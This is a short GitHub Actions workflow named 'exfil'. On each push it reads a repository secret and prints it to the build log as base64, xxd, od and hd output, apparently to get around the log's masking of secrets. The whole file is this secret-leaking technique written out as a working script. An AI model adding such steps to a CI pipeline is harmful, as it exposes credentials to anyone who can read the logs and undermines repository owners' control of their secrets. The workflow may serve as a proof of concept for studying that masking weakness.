name: exfil

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v1
    - name: Run a one-line script
      env:
        SUPER_SECRET: ${{ secrets.SuperSecret }}
      run: |
              echo "dswaa$SUPER_SECRET" | base64
              echo $SUPER_SECRET | xxd
              echo $SUPER_SECRET | od --endian=big 
              echo $SUPER_SECRET | hd 
